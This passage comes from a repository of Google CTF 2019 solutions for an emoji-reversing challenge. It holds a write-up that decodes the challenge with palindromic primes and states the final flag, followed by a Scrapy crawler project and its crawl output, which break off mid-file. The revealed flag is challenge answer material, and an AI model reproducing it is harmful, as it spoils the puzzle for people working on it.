to make the calculations more effecient. They seem to specific primes however, not just any prime number. There is an [online database for number sequences](oeis.org/) so we can just enter those numbers in there and we can see that they are [palindromic prime numbers](https://oeis.org/A002385). It even gives us a small list and algorithms to find them. Another observation is that the palindromes are in order, so now we can just calculate them and xor each one with the values. `extract-palindromes.py` outputs a list of palindromes in the `palindromes` file. Filtering the first 6 million primes is enough to get all the palindromes needed. `palindromes.py` reads the list of palindromes and xors them with the correct values. 42 | 43 | The first chunk prints out `http://emoji-t0anaxnr3nacpt4na.web.ctfco` and we can see already, that the url is longer than the one we had earlier. We already know the rest of the url which is `mpetition.com/` and that matches the number of values in the next chunk. Use this, we can reverse it and double check that we are doing it correctly. If we try doing the same thing with the second chunk, it does not produce the same output. This is where the `🚛 🥈 9️⃣ 9️⃣ ✋` comes in. That value gives us the starting index - 1. Finally, the full url is `http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/humans_and_cauliflowers_network/` and we can get the flag `CTF{Peace_from_Cauli!}`. -------------------------------------------------------------------------------- /07-reversing-emoji/__pycache__/crawl.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/crawl.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/__pycache__/vm.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/__pycache__/vm.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__init__.py -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/__pycache__/settings.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/items.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your scraped items 4 | # 5 | # See documentation in: 6 | # https://doc.scrapy.org/en/latest/topics/items.html 7 | 8 | import scrapy 9 | 10 | 11 | class ImageItem(scrapy.Item): 12 | # define the fields for your item here like: 13 | # name = scrapy.Field() 14 | image_urls=Field() 15 | images=Field() 16 | pass 17 | -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/middlewares.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your spider middleware 4 | # 5 | # See documentation in: 6 | # https://doc.scrapy.org/en/latest/topics/spider-middleware.html 7 | 8 | from scrapy import signals 9 | 10 | 11 | class CtfCrawlSpiderMiddleware(object): 12 | # Not all methods need to be defined. If a method is not defined, 13 | # scrapy acts as if the spider middleware does not modify the 14 | # passed objects. 15 | 16 | @classmethod 17 | def from_crawler(cls, crawler): 18 | # This method is used by Scrapy to create your spiders. 19 | s = cls() 20 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 21 | return s 22 | 23 | def process_spider_input(self, response, spider): 24 | # Called for each response that goes through the spider 25 | # middleware and into the spider. 26 | 27 | # Should return None or raise an exception. 28 | return None 29 | 30 | def process_spider_output(self, response, result, spider): 31 | # Called with the results returned from the Spider, after 32 | # it has processed the response. 33 | 34 | # Must return an iterable of Request, dict or Item objects. 35 | for i in result: 36 | yield i 37 | 38 | def process_spider_exception(self, response, exception, spider): 39 | # Called when a spider or process_spider_input() method 40 | # (from other spider middleware) raises an exception. 41 | 42 | # Should return either None or an iterable of Response, dict 43 | # or Item objects. 44 | pass 45 | 46 | def process_start_requests(self, start_requests, spider): 47 | # Called with the start requests of the spider, and works 48 | # similarly to the process_spider_output() method, except 49 | # that it doesn’t have a response associated. 50 | 51 | # Must return only requests (not items). 52 | for r in start_requests: 53 | yield r 54 | 55 | def spider_opened(self, spider): 56 | spider.logger.info('Spider opened: %s' % spider.name) 57 | 58 | 59 | class CtfCrawlDownloaderMiddleware(object): 60 | # Not all methods need to be defined. If a method is not defined, 61 | # scrapy acts as if the downloader middleware does not modify the 62 | # passed objects. 63 | 64 | @classmethod 65 | def from_crawler(cls, crawler): 66 | # This method is used by Scrapy to create your spiders. 67 | s = cls() 68 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 69 | return s 70 | 71 | def process_request(self, request, spider): 72 | # Called for each request that goes through the downloader 73 | # middleware. 74 | 75 | # Must either: 76 | # - return None: continue processing this request 77 | # - or return a Response object 78 | # - or return a Request object 79 | # - or raise IgnoreRequest: process_exception() methods of 80 | # installed downloader middleware will be called 81 | return None 82 | 83 | def process_response(self, request, response, spider): 84 | # Called with the response returned from the downloader. 85 | 86 | # Must either; 87 | # - return a Response object 88 | # - return a Request object 89 | # - or raise IgnoreRequest 90 | return response 91 | 92 | def process_exception(self, request, exception, spider): 93 | # Called when a download handler or a process_request() 94 | # (from other downloader middleware) raises an exception. 95 | 96 | # Must either: 97 | # - return None: continue processing this exception 98 | # - return a Response object: stops process_exception() chain 99 | # - return a Request object: stops process_exception() chain 100 | pass 101 | 102 | def spider_opened(self, spider): 103 | spider.logger.info('Spider opened: %s' % spider.name) 104 | -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/pipelines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define your item pipelines here 4 | # 5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting 6 | # See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html 7 | 8 | class CtfCrawlPipeline(object): 9 | def process_item(self, item, spider): 10 | return item 11 | -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Scrapy settings for ctf_crawl project 4 | # 5 | # For simplicity, this file contains only settings considered important or 6 | # commonly used. You can find more settings consulting the documentation: 7 | # 8 | # https://doc.scrapy.org/en/latest/topics/settings.html 9 | # https://doc.scrapy.org/en/latest/topics/downloader-middleware.html 10 | # https://doc.scrapy.org/en/latest/topics/spider-middleware.html 11 | 12 | BOT_NAME = 'ctf_crawl' 13 | 14 | SPIDER_MODULES = ['ctf_crawl.spiders'] 15 | NEWSPIDER_MODULE = 'ctf_crawl.spiders' 16 | 17 | 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent 19 | #USER_AGENT = 'ctf_crawl (+http://www.yourdomain.com)' 20 | 21 | # Obey robots.txt rules 22 | ROBOTSTXT_OBEY = True 23 | 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16) 25 | #CONCURRENT_REQUESTS = 32 26 | 27 | # Configure a delay for requests for the same website (default: 0) 28 | # See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay 29 | # See also autothrottle settings and docs 30 | #DOWNLOAD_DELAY = 3 31 | # The download delay setting will honor only one of: 32 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16 33 | #CONCURRENT_REQUESTS_PER_IP = 16 34 | 35 | # Disable cookies (enabled by default) 36 | #COOKIES_ENABLED = False 37 | 38 | # Disable Telnet Console (enabled by default) 39 | #TELNETCONSOLE_ENABLED = False 40 | 41 | # Override the default request headers: 42 | #DEFAULT_REQUEST_HEADERS = { 43 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 44 | # 'Accept-Language': 'en', 45 | #} 46 | 47 | # Enable or disable spider middlewares 48 | # See https://doc.scrapy.org/en/latest/topics/spider-middleware.html 49 | #SPIDER_MIDDLEWARES = { 50 | # 'ctf_crawl.middlewares.CtfCrawlSpiderMiddleware': 543, 51 | #} 52 | 53 | # Enable or disable downloader middlewares 54 | # See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html 55 | #DOWNLOADER_MIDDLEWARES = { 56 | # 'ctf_crawl.middlewares.CtfCrawlDownloaderMiddleware': 543, 57 | #} 58 | 59 | # Enable or disable extensions 60 | # See https://doc.scrapy.org/en/latest/topics/extensions.html 61 | #EXTENSIONS = { 62 | # 'scrapy.extensions.telnet.TelnetConsole': None, 63 | #} 64 | 65 | # Configure item pipelines 66 | # See https://doc.scrapy.org/en/latest/topics/item-pipeline.html 67 | ITEM_PIPELINES = {'scrapy.pipelines.images.ImagesPipeline': 1} 68 | IMAGES_STORE = 'images' 69 | 70 | # Enable and configure the AutoThrottle extension (disabled by default) 71 | # See https://doc.scrapy.org/en/latest/topics/autothrottle.html 72 | #AUTOTHROTTLE_ENABLED = True 73 | # The initial download delay 74 | #AUTOTHROTTLE_START_DELAY = 5 75 | # The maximum download delay to be set in case of high latencies 76 | #AUTOTHROTTLE_MAX_DELAY = 60 77 | # The average number of requests Scrapy should be sending in parallel to 78 | # each remote server 79 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 80 | # Enable showing throttling stats for every response received: 81 | #AUTOTHROTTLE_DEBUG = False 82 | 83 | # Enable and configure HTTP caching (disabled by default) 84 | # See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings 85 | #HTTPCACHE_ENABLED = True 86 | #HTTPCACHE_EXPIRATION_SECS = 0 87 | #HTTPCACHE_DIR = 'httpcache' 88 | #HTTPCACHE_IGNORE_HTTP_CODES = [] 89 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' 90 | -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__init__.py: -------------------------------------------------------------------------------- 1 | # This package will contain the spiders of your Scrapy project 2 | # 3 | # Please refer to the documentation for information on how to create and manage 4 | # your spiders. 5 | -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/__pycache__/cat_images.cpython-36.pyc -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/ctf_crawl/spiders/cat_images.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import scrapy 3 | import scrapy.item 4 | 5 | 6 | class CatImagesSpider(scrapy.Spider): 7 | name = 'cat_images' 8 | allowed_domains = ['emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com'] 9 | start_urls = ['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com'] 10 | 11 | def parse(self, response): 12 | for img in response.xpath('//img[@src]/@src').getall(): 13 | yield ImageItem(image_urls=['http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/' + img]) 14 | yield {'url': response.url} 15 | 16 | for next_page in response.xpath('//ul/li/a[@href]/@href').getall(): 17 | yield response.follow(next_page, self.parse) 18 | 19 | class ImageItem(scrapy.Item): 20 | image_urls=scrapy.Field() 21 | images=scrapy.Field() 22 | pass -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/images.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/dsafa/google-ctf-2019/240bebb176175aad19dab96e6440b39a080c9dad/07-reversing-emoji/ctf_crawl/images.zip -------------------------------------------------------------------------------- /07-reversing-emoji/ctf_crawl/output.json: -------------------------------------------------------------------------------- 1 | [ 2 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com", "images": []}, 3 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-22.png", "path": "full/b66cef15fb1f24f0357c293fabd1ee4ae370fcea.jpg", "checksum": "da8327ecd3cf8045541b5297509d3b55"}]}, 4 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/7e7399c7d06333ec886eee6b678d3595.html", "images": []}, 5 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c4827b3b9c0c9e94183f30303f1cf8cf.html", "images": []}, 6 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/94ad2d38e6c461572bad2199d0fd00ff.html", "images": []}, 7 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/eaccf8725acda38ec2c1d9a591d54601.html", "images": []}, 8 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/211fb2008f7e90b83c307931957642aa.html", "images": []}, 9 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-47.png", "path": "full/92c5bebb4a1a5a2abe763662410522e020370036.jpg", "checksum": "915360b466171ae973a31f36a8dccf2b"}]}, 10 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-16.png", "path": "full/9a98f8e6371a0c0bee4db8fbdc16e1de6e20b358.jpg", "checksum": "030ab1ea9f6a2575d3b761c9e6f94cf4"}]}, 11 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/cdea521070598db1a707d2e143e374e3.html", "images": []}, 12 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/0aecf5c83a232343bb1b1b7ffb666438.html", "images": []}, 13 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bc38f47945d2d515719a37dacd214240.html", "images": []}, 14 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-28.png", "path": "full/3f98ab360a2a663c47ea4e6c264e286801f0e321.jpg", "checksum": "a45acf55d7eafba433e029a4f77156ff"}]}, 15 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-52.png", "path": "full/c9d6bd3443944576a8f1c9db3e023a9c3fd0f093.jpg", "checksum": "daf4d5b53e8150cc34c4f929dafe6176"}]}, 16 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-27.png", "path": "full/4654a4edf8b48b6f0b25344d4732cdb363f9fd86.jpg", "checksum": "7bedf20344ed7396ada03e05568d342a"}]}, 17 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b9ef5a48186aacc5a1ca7e3f6edd48d2.html", "images": []}, 18 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f6b0fe40439503e23e68e62a8af8e52.html", "images": []}, 19 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/168d5019cd091949cbbdc06acb80d78a.html", "images": []}, 20 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f30bc5c7375ba52fed40659140e6460e.html", "images": []}, 21 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4d1f3b376efdb55bcf4d6ac77b088073.html", "images": []}, 22 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b50d83f0910a5ecc2809ff6576d8e845.html", "images": []}, 23 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5850a44366b4286c2d2f758a05c246f5.html", "images": []}, 24 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/1110015dc696d6c73e3f9aece0a8bcd9.html", "images": []}, 25 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9f9dbf163a76a90fd2a6b4de1010841e.html", "images": []}, 26 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/41c19f57ef225ddb1c63a4d1b008214c.html", "images": []}, 27 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f9e55e5fefd6ab08428c35b310bddbaf.html", "images": []}, 28 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/fedcf4569e5de4486998651b0f804ae5.html", "images": []}, 29 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4f3400fc1c3427d937821b012f7aecc.html", "images": []}, 30 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/9ca6dd45f49a59e5a8e2e87294acb42e.html", "images": []}, 31 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-36.png", "path": "full/22d41b0a6ed5e6eb26978dc9947348984fa2751a.jpg", "checksum": "b747ee5de7b71378689ddf28b4e0324d"}]}, 32 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-33.png", "path": "full/92570bbf9f191675caa67287efbbc6cc305359f4.jpg", "checksum": "fe800727805b94d62b6890c20d700eda"}]}, 33 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-08.png", "path": "full/fffac339f992de646f4afda9e397f8a944cc892a.jpg", "checksum": "12cc841fd891e084d098d2c1dff20e40"}]}, 34 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/5bfb79469792c7dde95217f19536be92.html", "images": []}, 35 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-14.png", "path": "full/039a702f65c376fae9a12c05bdd8a8b3b59c7dda.jpg", "checksum": "afbe89777fc107502443bcd18a24b125"}]}, 36 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2817b54b53077139e388c240060035f.html", "images": []}, 37 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-29.png", "path": "full/83f48d80345289ed99ab4223a06c1e82f1040753.jpg", "checksum": "be4d0c75228e1320eedceb53952da777"}]}, 38 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f0ce6a8adea95e300fab564bf80689d9.html", "images": []}, 39 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-21.png", "path": "full/97e1e344d7c6fef1407268f46e111739a4f6b209.jpg", "checksum": "5b27adc11e6e7e4aadd002ea43bf9ed8"}]}, 40 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-56.png", "path": "full/38a562208b2c75253faf0ce904e3315941229e27.jpg", "checksum": "a959798a56e336faf024f7f5cf3e7278"}]}, 41 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-25.png", "path": "full/9629f6e5f45c96f6baeffd4537492dc292967e51.jpg", "checksum": "9329bfc1986df8b54d0a764c9ac9aee3"}]}, 42 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/c2d71f56f6b55ef8ded7544d45717c92.html", "images": []}, 43 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-48.png", "path": "full/85314f7ad344aa310a68e2a4dba35b5351241394.jpg", "checksum": "0ac23f09bd44defda99c2866811b9f98"}]}, 44 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/e0b54759634476f01beffd1f0171ede1.html", "images": []}, 45 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-12.png", "path": "full/9eda20a2e263c2f8b86403961f8dd4d7bb690f63.jpg", "checksum": "9da6095016ea0f36f45dbe7eaad983ab"}]}, 46 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/bae8f02cb87dcb8f13fa8ba41a45ba70.html", "images": []}, 47 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d5759ae9d021e5749b4fb627c539c51c.html", "images": []}, 48 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/750842afeb0e9be2b12e022b166c0a1c.html", "images": []}, 49 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-45.png", "path": "full/7c2112573a36c6ecd0fcaee7910262d9261ad3a7.jpg", "checksum": "3a3620d255565ad02a85d7f977333313"}]}, 50 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d4b30b716bfa0481c0d77a40e49c18d5.html", "images": []}, 51 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-07.png", "path": "full/c4218cd04fd778cb294126da9e8080d2698b48c2.jpg", "checksum": "7d69d714d7e8bb496fb5fd8c715b16f7"}]}, 52 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/3942ec1a459fcf0a2270e9e2b1b735d9.html", "images": []}, 53 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-53.png", "path": "full/65956be3df8d2cf2dd92b68bc27ca00d971c90cf.jpg", "checksum": "8fefb94e886b31a4d18713734a380926"}]}, 54 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-15.png", "path": "full/a16ef5e5ac564d8575751c92d1a79bec626b1291.jpg", "checksum": "f380f9a007b1c95dd5c4d396d14811ad"}]}, 55 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-30.png", "path": "full/3399391f56c8cf33639811e23ec1b0680331f828.jpg", "checksum": "129c07390481e91e982f40ce09014878"}]}, 56 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-26.png", "path": "full/718d65f9d78edbb731d393133d9ad1e7c17f3918.jpg", "checksum": "07ea3c9a50faeb2226e34ac9359a703c"}]}, 57 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-46.png", "path": "full/0e1eb22bdc579904b1fcb1e47779dbe0101c47f6.jpg", "checksum": "e0c267f5042a480d4e8b5a66d567bcfd"}]}, 58 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/baa23943b1a503845bdef9cdf4700a08.html", "images": []}, 59 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/b96110364868f63f1f6d0967addad330.html", "images": []}, 60 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-37.png", "path": "full/ea44bc35b1c061514df02383d43144e0ad8cfd99.jpg", "checksum": "b716a56675f009d8d96775357f11eb15"}]}, 61 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-10.png", "path": "full/ec4c33f2a3b93616e7ced72ce9dcc43a9db8da10.jpg", "checksum": "625f4ded6d3f3babd4603a534bce77ca"}]}, 62 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-31.png", "path": "full/467eb907739397a78c295c7ec9c73fdbbd1a5b11.jpg", "checksum": "a8bfb781aaf0efe9819895e036a4e548"}]}, 63 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/f10e496cacb28e2a77eb8f750741440e.html", "images": []}, 64 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/455a9d95d3f48a2703d02e734d18ab14.html", "images": []}, 65 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/4b556ca0f01983aca5856901d1e5a2d1.html", "images": []}, 66 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/42c8cc7f22acfa5d7ef297bdae2ba743.html", "images": []}, 67 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d048074b981e463b4df2bf24b09d51c9.html", "images": []}, 68 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d929d4e9b615822d28e3c74cc3df0a36.html", "images": []}, 69 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/22157e71e3d340dbc1191565ccf97544.html", "images": []}, 70 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/d8dc0f5386fc47d7f65df3134de92fff.html", "images": []}, 71 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-05.png", "path": "full/006ee3c4a70c4b66658e16cf9970fb2accd2d943.jpg", "checksum": "8b168e56c5e0daae14c6df45d6af8c7a"}]}, 72 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-34.png", "path": "full/2e7bd553d7169e3c5e99bb1b14023da779c37afd.jpg", "checksum": "6dfd617e35381d67f1b515a167a6276b"}]}, 73 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/ebf110c11d160eaaa91d441305ff8874.html", "images": []}, 74 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/8b163f2f9559f60517c09fa6a177da79.html", "images": []}, 75 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/253e66a37fe263f34cfe46d817b3cd16.html", "images": []}, 76 | {"image_urls": ["http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png"], "images": [{"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/pics/catpic-50.png", "path": "full/94fc1e0084ce3836bcb9aaa625ee02142ed17a74.jpg", "checksum": "e89cc47dee6c5fc3de3358f351a10fe2"}]}, 77 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/656eb695e3bb2feab65808d5bec205f2.html", "images": []}, 78 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/27c57d4efda38a82a001127bf3409e45.html", "images": []}, 79 | {"url": "http://emoji-t0anaxnr3nacpt4na.web.ctfcompetition.com/968674872368d11d99758f9f4fa33d58.html", "images": []}, 80 | {"url": 